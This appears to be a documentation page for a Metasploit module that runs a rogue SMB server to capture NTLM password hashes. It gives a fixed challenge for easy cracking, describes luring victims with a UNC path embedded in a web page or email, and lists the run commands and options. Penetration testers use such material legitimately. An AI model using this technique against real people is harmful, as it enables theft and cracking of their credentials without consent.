Authentication Capture: SMB
This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the ripper (with jumbo patch). To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate.
Rank
- Normal
Authors
- hdm < hdm [at] metasploit.com >
Development
Similar Modules
- auxiliary/server/capture/ftp
- auxiliary/server/capture/http
- auxiliary/server/capture/http_javascript_keylogger
- auxiliary/server/capture/http_ntlm
- auxiliary/server/capture/imap
- auxiliary/server/capture/pop3
- auxiliary/server/capture/smtp
- auxiliary/server/capture/telnet
Usage Information
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > run
Module Options
| CAINPWFILE | The local filename to store the hashes in Cain&Abel format |
| CHALLENGE | The 8 byte challenge (default: 1122334455667788) |
| JOHNPWFILE | The prefix to the local filename to store the hashes in JOHN format |
| SRVHOST | The local host to listen on. This must be an address on the local machine or 0.0.0.0 (default: 0.0.0.0) |
| SRVPORT | The local port to listen on. (default: 445) |
| SSL | Negotiate SSL for incoming connections |
| SSLCert | Path to a custom SSL certificate (default is randomly generated) |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3) |
| DOMAIN_NAME | The domain name used during smb exchange with smb extended security set |
| ListenerComm | The specific communication channel to use for this service |
| NTLM_UseNTLM2_session | Activate the 'negociate NTLM2 key' flag in NTLM authentication. When SMB extended security negociation is set, client will use ntlm2_session instead of ntlmv1 (default on win 2K and above) |
| SMB_EXTENDED_SECURITY | Use smb extended security negociation, when set client will use ntlmssp, if not then client will use classic lanman authentification |
| USE_GSS_NEGOCIATION | Send a gss_security blob in smb_negociate response when SMB extended security is set. When this flag is not set, Windows will respond without gss encapsulation, Ubuntu will still use gss. |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| TCP::max_send_size | Maximum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |